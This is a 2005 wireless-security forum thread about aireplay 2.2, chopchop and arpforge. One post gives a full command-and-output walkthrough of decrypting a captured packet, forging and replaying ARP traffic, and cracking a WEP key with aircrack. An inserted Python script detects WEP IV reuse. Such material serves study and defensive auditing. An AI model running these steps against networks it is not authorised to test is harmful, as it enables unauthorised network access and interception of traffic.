NetStumbler.org Forums

12-30-2004   #1
2marshall8
Registered Member
 
Join Date: Dec 2004
Posts: 14
Aireplay Single NIC patch

I'm looking for either a tarball that has Aireplay compiled with the patch Korek came up with for injecting and sniffing on the same NIC, or the wlan-ng patch which is applied to aireplay to enable this. Where can I get this? I looked in other threads and only found people talking about how they had tried it. I would really like to try this on my AP to see if I can get it to work.

thanks
marshall
02-23-2005   #2
devine
Emergence
 
Join Date: Jul 2004
Location: Paris
Posts: 389
Quote:
Originally Posted by 2marshall8
I'm looking for either a tarball that has Aireplay compiled with the patch Korek came up with for injecting and sniffing on the same NIC, or the wlan-ng patch which is applied to aireplay to enable this. Where can I get this?
Try http://www.cr0.net:8040/code/network/aireplay-2.2.tgz
03-01-2005   #3
tekn0
Registered Member
 
Join Date: Jan 2005
Posts: 36
im having a little problem with the arp request forgery technique in your
readme, i know it's not directly related to aireplay 2.2 but i thought my
problem might be of help for future version features/ideas and if not im
sorry and i understand :)

here is my output sorry but it's a bit long.
packets came from going to a web site on a client machine.

D-Link=00:0D:88:8D:18:2F
WinXP=00:04:E2:D8:7B:AF

root@tekn0:~/root/aireplay-2.2# ./aireplay -i wlan0 -b 00:0D:88:8D:18:2F
Seen 23 packets, none usable...
Found one usable WEP data packet:

From DS = 1, To DS = 0
BSSID = 00:0D:88:8D:18:2F
Src. MAC = 00:04:E2:D8:7B:AF
Dst. MAC = FF:FF:FF:FF:FF:FF

0x0000: 0842 0000 ffff ffff ffff 000d 888d 182f .B............./
0x0010: 0004 e2d8 7baf c039 720b 0000 4748 2efd ....{..9r...GH..
0x0020: 764c 584c 7458 74fd 2415 8431 19be 090c vLXLtXt.$..1....
0x0030: 13ef 6747 deeb 94f1 39d8 0264 0b63 492e ..gG....9..d.cI.
0x0040: fc5d 4cc4 .]L.

Replay this packet ? n
Seen 24 packets, none usable...
Found one usable WEP data packet:

From DS = 1, To DS = 0
BSSID = 00:0D:88:8D:18:2F
Src. MAC = 00:04:E2:D8:7B:AF
Dst. MAC = FF:FF:FF:FF:FF:FF

0x0000: 0842 0000 ffff ffff ffff 000d 888d 182f .B............./
0x0010: 0004 e2d8 7baf d039 730b 0000 f139 86f9 ....{..9s....9..
0x0020: 8ea9 2e1b 7858 88a6 325d d0c0 afd6 72cc ....xX..2]....r.
0x0030: f21e a8ca 20ea 8f07 b883 bcbd d47a ec1f .... ........z..
0x0040: 424f af5d BO.]

Replay this packet ? n
Seen 25 packets, none usable...
Found one usable WEP data packet:

From DS = 1, To DS = 0
BSSID = 00:0D:88:8D:18:2F
Src. MAC = 00:0D:88:8D:18:2F
Dst. MAC = 00:04:E2:D8:7B:AF

0x0000: 0842 7500 0004 e2d8 7baf 000d 888d 182f .Bu.....{....../
0x0010: 000d 888d 182f e039 912b 0000 a319 731f ...../.9.+....s.
0x0020: bf78 0abc 34cf 559e a2ac 1b39 0175 211f .x..4.U....9.u!.
0x0030: ce35 2f44 1d77 db46 71eb 3bb7 093b 5502 .5/D.w.Fq.;..;U.
0x0040: a63d cc5e 6080 91c0 .=.^`...

Replay this packet ? y
Saving replayed packet in replay-20050201_2144.cap
root@tekn0:~/root/aireplay-2.2# ./chopchop-0.1/chopchop -b 00:0D:88:8D:18:2F -m 00:04:E2:D8:7B:AF -p replay-20050201_2144.cap
00:0D:88:8D:18:2F 6
0
00:04:E2:D8:7B:AF 6
first pass
-----------------
packet number 001
base src mac: 00 04 e2 d8 7b af
base dst mac: ff 0a 2d 13 49 38
guess 0x7a / number of frame written 130
guess 0x67 / number of frame written 104
guess 0xcb / number of frame written 208
guess 0xbe / number of frame written 195
guess 0x6e / number of frame written 117
guess 0x00 / number of frame written 9
guess 0xa8 / number of frame written 169
guess 0xc0 / number of frame written 195
guess 0x6e / number of frame written 117
guess 0x00 / number of frame written 5
guess 0xa8 / number of frame written 169
guess 0xc0 / number of frame written 195
guess 0xaf / number of frame written 182
guess 0x7b / number of frame written 130
guess 0xd8 / number of frame written 221
guess 0xe2 / number of frame written 234
guess 0x04 / number of frame written 13
guess 0x00 / number of frame written 8
guess 0x01 / number of frame written 7
guess 0x00 / number of frame written 4
guess 0xa8 / number of frame written 169
guess 0xc0 / number of frame written 195
guess 0x2f / number of frame written 52
guess 0x18 / number of frame written 39
guess 0x8d / number of frame written 143
guess 0x88 / number of frame written 143
guess 0x0d / number of frame written 273
guess 0x00 / number of frame written 12
guess 0x02 / number of frame written 13
guess 0x00 / number of frame written 13
guess 0x04 / number of frame written 13
guess 0x06 / number of frame written 13

then it just hangs and does nothing
am i not waiting long enough?, waited 5 minutes.

i have tried a few different packets although im not sure what types they
were nor the sizes but they all hang in the same manner, they spit out a
bunch of "frame written 13" at the end

i followed the instructions in the readme although im not sure exactly
what packet to pick i tried to use ones that had source and dest fields
filled in and not use any packets with ff:ff:ff:ff:ff:ff for the dst mac.

also does aireplay 2.2 have any way to display the packet
size when it's asking you if you want to use the packet and would you know
of the best packets to use, i know arps/tcp ack/and dhcp are supposed to
work well but im not sure the best way to tell the size of the packet.

thanks again for such a great tool and all your time and help.

Last edited by tekn0 : 03-01-2005 at 09:30 PM.
03-02-2005   #4
sylvain
Wireless Auditor
 
Join Date: Jun 2004
Location: Paris, France
Posts: 175
Quote:
Originally Posted by tekn0
im having a little problem with the arp request forgery technique in your
readme, i know it's not directly related to aireplay 2.2 but i thought my
problem might be of help for future version features/ideas and if not im
sorry and i understand
I had the same problem...it's more chopchop performance than aireplay... in general it takes too much time to decrypt the packet with chopchop
03-02-2005   #5
sylvain
Wireless Auditor
 
Join Date: Jun 2004
Location: Paris, France
Posts: 175
It's why attack a and b in aireplay-2.2 are still more effective...
03-02-2005   #6
devine
Emergence
 
Join Date: Jul 2004
Location: Paris
Posts: 389
Quote:
Originally Posted by sylvain
I had the same problem...it's more chopchop performance than aireplay... in general it takes too much time to decrypt the packet with chopchop
Yep, I had the same problem too. Anyway I'll code a new version of chopchop, as some modifications are needed to make it support prism54 and madwifi injection.
03-02-2005   #7
sylvain
Wireless Auditor
 
Join Date: Jun 2004
Location: Paris, France
Posts: 175
Quote:
Originally Posted by devine
Yep, I had the same problem too. Anyway I'll code a new version of chopchop, as some modifications are needed to make it support prism54 and madwifi injection.
you're the man christophe !
03-02-2005   #8
Dutch
Humourless EuroMod.
 
Join Date: Mar 2004
Location: City of Mermaids, Denmark
Posts: 6,813
Quote:
Originally Posted by devine
Yep, I had the same problem too. Anyway I'll code a new version of chopchop, as some modifications are needed to make it support prism54 and madwifi injection.
You rock!!!

Dutch
__________________
All your answers are belong to Google. SEARCH DAMMIT!
Warning. Warning.
Low C8H10N4O2 level detected. Operator halted....
03-02-2005   #9
Dutch
Humourless EuroMod.
 
Join Date: Mar 2004
Location: City of Mermaids, Denmark
Posts: 6,813
Quote:
Originally Posted by tekn0
im having a little problem with the arp request forgery technique in your
readme, i know it's not directly related to aireplay 2.2 but i thought my
problem might be of help for future version features/ideas and if not im
sorry and i understand
Before doing anything else, read ALL the posts in the Welcome Desk section, paying particular notice to the post regarding the usage of proper English on the forums.
If you don't start using capitalization and punctuation in your posts, they WILL be deleted.
Final warning.

Dutch
03-02-2005   #10
tekn0
Registered Member
 
Join Date: Jan 2005
Posts: 36
i just had complete success

I just had complete success.
Sorry again for the long post.

System: Slackware 10 2.4
Card: SMC 2532W-B Elite Connect PCMCIA

(Macs Have Been Changed To Protect The Innocent)
First i set the network state and put the card into monitor mode.
Then i started sniffing for my router and found it,
but im not running wpa (maybe a new linksys firmware trick).

root@tekn0:~# state.wlan wlan0 enable ; monitor.wlan wlan0 6
root@tekn0:~# airodump wlan0 linksys2

BSSID CH MB ENC PWR Packets LAN IP / # IVs ESSID

12:12:12:12:12:12 6 48 WPA -1 100 10 linksys

Then i started aireplay to get a usable data packet.
After a bunch of random packets i decided to try this one for some reason.

root@tekn0:~#./aireplay -i wlan0 -b 12:12:12:12:12:12
(ABOUT 10 PACKETS DOWN i think i pressed "n" about 10 times hehe)
Found one usable WEP data packet:

From DS = 1, To DS = 0
BSSID = 12:12:12:12:12:12
Src. MAC = 34:34:34:34:34:34
Dst. MAC = FF:FF:FF:FF:FF:FF

0x0000: 0842 0000 ffff ffff ffff 0012 173f 9cf2 .B...........?..
0x0010: 0011 9518 3d42 d0c5 a785 0b00 a993 bbb0 ....=B..........
0x0020: bb03 1cde 2151 5b7a 54bc 4d03 b728 d7ab ....!Q[zT.M..(..
0x0030: 1553 cd37 56ee 0be4 f881 46e1 eb15 f75b .S.7V.....F....[
0x0040: 4f40 a83e a88a b7cf b00f 871c 78d0 e6f7 O@.>........x...
0x0050: d50a 8f9d d14d 3753 2528 b7bf 4dcc c226 .....M7S%(..M..&
0x0060: ccf4 53e8 da74 78f1 d158 15ff 0707 9fbe ..S..tx..X......
0x0070: db17 fa4a da42 8e8d 8157 7291 eaa9 7b5f ...J.B...Wr...{_
0x0080: bb4c 5fbd b681 4c09 .L_...L.

Replay this packet ? y
Saving replayed packet in replay-20050202_2102.cap

Next i ran chopchop with the new packet and crossed my fingers. :)

root@tekn0:~# ./chopchop-0.1/chopchop -i wlan0 -b 12:12:12:12:12:12 -m 34:34:34:34:34:34 -p replay-20050202_2102.cap
12:12:12:12:12:12 6
0
34:34:34:34:34:34 6
first pass
-----------------
packet number 001
base src mac: 12 12 12 12 12 12 <-----(THIS WAS DIFFERENT FROM WHAT I ENTERED ON THE COMMAND LINE BUT I CHANGED IT FOR THIS POST)
base dst mac: 34 34 34 34 34 34 <-----(THIS WAS ALSO DIFFERENT)
guess 0xaa / number of frame written 183
guess 0x06 / number of frame written 27
guess 0x85 / number of frame written 156
guess 0x77 / number of frame written 131
guess 0x65 / number of frame written 110
guess 0x01 / number of frame written 25
guess 0xa8 / number of frame written 197
guess 0xc0 / number of frame written 207
guess 0x00 / number of frame written 24
guess 0xe0 / number of frame written 496
guess 0x06 / number of frame written 28
guess 0x00 / number of frame written 27
guess 0xe0 / number of frame written 236
guess 0x93 / number of frame written 158
guess 0x04 / number of frame written 27
guess 0x00 / number of frame written 21
guess 0x01 / number of frame written 27
guess 0x00 / number of frame written 27
guess 0x20 / number of frame written 66
guess 0x00 / number of frame written 19
guess 0x0c / number of frame written 14
guess 0xc0 / number of frame written 222
guess 0x01 / number of frame written 27
guess 0x00 / number of frame written 27
guess 0x20 / number of frame written 40
guess 0x00 / number of frame written 14
guess 0x00 / number of frame written 23
guess 0x4f / number of frame written 86
guess 0x42 / number of frame written 80
guess 0x41 / number of frame written 79
guess 0x43 / number of frame written 79
guess 0x41 / number of frame written 80
guess 0x43 / number of frame written 93
guess 0x41 / number of frame written 93
guess 0x43 / number of frame written 92
guess 0x41 / number of frame written 92
guess 0x43 / number of frame written 79
guess 0x41 / number of frame written 79
guess 0x43 / number of frame written 92
guess 0x41 / number of frame written 79
guess 0x43 / number of frame written 79
guess 0x41 / number of frame written 71
guess 0x43 / number of frame written 76
guess 0x46 / number of frame written 79
guess 0x45 / number of frame written 92
guess 0x46 / number of frame written 79
guess 0x46 / number of frame written 72
guess 0x42 / number of frame written 86
guess 0x46 / number of frame written 92
guess 0x43 / number of frame written 75
guess 0x46 / number of frame written 78
guess 0x42 / number of frame written 77
guess 0x45 / number of frame written 79
guess 0x4e / number of frame written 105
guess 0x45 / number of frame written 79
guess 0x42 / number of frame written 352
guess 0x45 / number of frame written 73
guess 0x4d / number of frame written 92
guess 0x45 / number of frame written 88
guess 0x20 / number of frame written 53
guess 0x01 / number of frame written 27
guess 0x00 / number of frame written 27
guess 0x00 / number of frame written 27
guess 0x00 / number of frame written 27
guess 0x00 / number of frame written 27
guess 0x00 / number of frame written 26
guess 0x01 / number of frame written 22
guess 0x00 / number of frame written 27
guess 0x10 / number of frame written 27
guess 0x29 / number of frame written 53
guess 0x14 / number of frame written 27
guess 0x80 / number of frame written 156
guess 0xda / number of frame written 235
guess 0x6f / number of frame written 131
guess 0x4c / number of frame written 101
guess 0x00 / number of frame written 27
guess 0x89 / number of frame written 149
guess 0x00 / number of frame written 14
guess 0x89 / number of frame written 170
guess 0x00 / number of frame written 27
guess 0xff / number of frame written 261
guess 0x01 / number of frame written 27
guess 0xa8 / number of frame written 176
guess 0xc0 / number of frame written 222
guess 0x65 / number of frame written 123
guess 0x01 / number of frame written 21
guess 0xa8 / number of frame written 182
guess 0xc0 / number of frame written 222
guess 0x94 / number of frame written 157
guess 0xb5 / number of frame written 196
guess 0x11 / number of frame written 27
guess 0x80 / number of frame written 144
guess 0x00 / number of frame written 27
guess 0x00 / number of frame written 517
guess 0x44 / number of frame written 70
guess 0x00 / number of frame written 27
guess 0x60 / number of frame written 105
guess 0x00 / number of frame written 27
guess 0x00 / number of frame written 27
guess 0x45 / number of frame written 79
OK

second pass
root@tekn0:~#

Awesome it worked :) And it only took like 1 min.
Notice There is not any instance of "frame written 13" (maybe thats the unlucky number?)
Then i used arpforge to create the forged packet.

root@tekn0:~# ./arpforge replay-20050202_2102.cap.iv.a7850b00 1 12:12:12:12:12:12 34:34:34:34:34:34 192.168.1.100 192.168.1.1 replay-test.cap
Done.

After that i replayed it.

root@tekn0:~# ./aireplay -r replay-test.cap wlan0

Found one usable WEP data packet:

From DS = 0, To DS = 1
BSSID = 12:12:12:12:12:12
Src. MAC = 34:34:34:34:34:34
Dst. MAC = FF:FF:FF:FF:FF:FF

0x0000: 0841 0201 0012 173f 9cf2 0011 9518 3d42 .A.....?......=B
0x0010: ffff ffff ffff 8001 a785 0b00 a993 bbb0 ................
0x0020: bb03 1cd8 6450 531a 52fc 4d02 3728 f727 ....dPS.R.M.7(.'
0x0030: e8b9 0cfa 9722 0a1b f808 4668 2bf1 9980 ....."....Fh+...
0x0040: 20f6 ba9c ...

Replay this packet ? y
Saving replayed packet in replay-20050202_2107.cap
Open airodump in another console to capture replies.
Sent 300599 packets at 247 pkt/s

Then i captured in airodump for about 20 mins and after 240,000+ IV's aircrack cracked it :)

root@tekn0:~# aircrack -n 64 linksys2.cap
Opening pcap file linksys2.cap
Choosing first WEP-encrypted BSSID = 12:12:12:12:12:12

aircrack 2.1

* Got 248182! unique IVs | fudge factor = 2
* Elapsed time [00:00:01] | tried 4 keys at 240 k/m

KB depth votes
0 0/ 3 AB( 33) F0( 33) ED( 17) 65( 15) C9( 15) AC( 12)
1 0/ 3 CD( 28) 30( 16) 3E( 15) 70( 13) CE( 12) 36( 10)
2 0/ 1 EF( 60) 6A( 21) 6F( 12) 77( 12) 50( 7) 6B( 6)
3 1/ 7 12( 15) 29( 15) 31( 15) 52( 15) 13( 12) 25( 12)
4 0/ 3 34( 27) 58( 15) 5B( 15) 5C( 12) EA( 12) 5E( 11)

KEY FOUND! [ 123456789a ]

EOF.

I hope this helps and thanks again for such amazing work :)
Also i still have the magic packet i used in replay-20050202_2102.cap if needed.

Last edited by tekn0 : 03-03-2005 at 01:52 AM.
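
Seen from the network's side, the replay step in the post above stands out: the forged frame carries the same IV bytes (a7 85 0b) as the captured frame and is sent hundreds of thousands of times, whereas the ordinary frames earlier in the thread change IV from one frame to the next (72 0b 00, then 73 0b 00). The following is an added example, not part of the original thread or of aireplay, that parses the header bytes shown in those dumps and flags the reuse; the function names, the threshold of 50 and the 500-frame sample stream are assumptions constructed for illustration.

```python
from collections import Counter

# First 28 bytes (802.11 header + IV + key-index byte) copied from the hex dumps
# in this thread; payloads are omitted because the check never looks at them.
NORMAL_1 = bytes.fromhex("0842 0000 ffff ffff ffff 000d 888d 182f 0004 e2d8 7baf c039 720b 0000")
NORMAL_2 = bytes.fromhex("0842 0000 ffff ffff ffff 000d 888d 182f 0004 e2d8 7baf d039 730b 0000")
CAPTURED = bytes.fromhex("0842 0000 ffff ffff ffff 0012 173f 9cf2 0011 9518 3d42 d0c5 a785 0b00")
FORGED = bytes.fromhex("0841 0201 0012 173f 9cf2 0011 9518 3d42 ffff ffff ffff 8001 a785 0b00")


def mac(raw: bytes) -> str:
    """Format six raw bytes as a colon-separated MAC address."""
    return ":".join(f"{b:02x}" for b in raw)


def parse_wep_frame(frame: bytes):
    """Decode the header of a WEP-protected 802.11 data frame, else return None."""
    if len(frame) < 2:
        return None
    fc0, flags = frame[0], frame[1]
    if (fc0 >> 2) & 0x3 != 2 or not flags & 0x40:  # not a data frame, or Protected bit clear
        return None
    to_ds, from_ds = bool(flags & 0x01), bool(flags & 0x02)
    if to_ds and from_ds:  # 4-address WDS frame: longer header, not handled here
        return None
    hdr_len = 26 if fc0 & 0x80 else 24  # QoS data subtypes carry 2 extra header bytes
    if len(frame) < hdr_len + 4:
        return None
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    # Which address field holds the BSSID depends on the To DS / From DS bits.
    bssid = a1 if to_ds else a2 if from_ds else a3
    return {
        "to_ds": to_ds,
        "from_ds": from_ds,
        "retry": bool(flags & 0x08),
        "bssid": mac(bssid),
        "transmitter": mac(a2),
        "iv": frame[hdr_len:hdr_len + 3].hex(),
        "key_index": frame[hdr_len + 3] >> 6,
    }


def find_iv_reuse(frames, threshold=50):
    """Return {(bssid, iv): count} for IVs seen at least `threshold` times.

    Frames with the Retry bit set are skipped, because a link-layer
    retransmission legitimately repeats the IV of the frame it retries.
    """
    counts = Counter()
    for frame in frames:
        info = parse_wep_frame(frame)
        if info is None or info["retry"]:
            continue
        counts[(info["bssid"], info["iv"])] += 1
    return {key: n for key, n in counts.items() if n >= threshold}


def sample_stream():
    """Constructed stream: three frames from the dumps, then the forged frame 500 times."""
    return [NORMAL_1, NORMAL_2, CAPTURED] + [FORGED] * 500


if __name__ == "__main__":
    for (bssid, iv), n in find_iv_reuse(sample_stream()).items():
        print(f"possible WEP replay: BSSID {bssid} IV {iv} seen {n} times")
```
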
03-03-2005   #11
sylvain
Wireless Auditor
 
Join Date: Jun 2004
Location: Paris, France
Posts: 175
how did you choose this "magic" packet ? you said you type 10 times "n" before choosing this one ? why did you do that ? just chance ?
03-03-2005   #12
tekn0
Registered Member
 
Join Date: Jan 2005
Posts: 36
No idea really, it just looked right to me, kinda strange heh.
So yes just a chance i guess.

Last edited by tekn0 : 03-03-2005 at 01:47 AM.
03-03-2005   #13
KoreK
Banned in DC
 
Join Date: Jul 2004
Posts: 102
What kind of packet was it, tekn0? My guess is non arp/ip, and I've got some bug in my code.
03-03-2005   #14
sylvain
Wireless Auditor
 
Join Date: Jun 2004
Location: Paris, France
Posts: 175
yep, could you please open the .cap file where the magic packet is with ethereal and put the result here.
thanks
03-03-2005   #15
Shockwave
Registered Member
 
Join Date: Nov 2004
Posts: 33
Hello,

chopchop hangs here for some hours now and I wonder how long it can take to finish working...

first pass
-----------------
packet number 001
base src mac: 00 0f b5 20 b2 ae
base dst mac: ff 59 fd c0 e5 a9

Also it does not use 100% CPU power, just ~50%...

Greets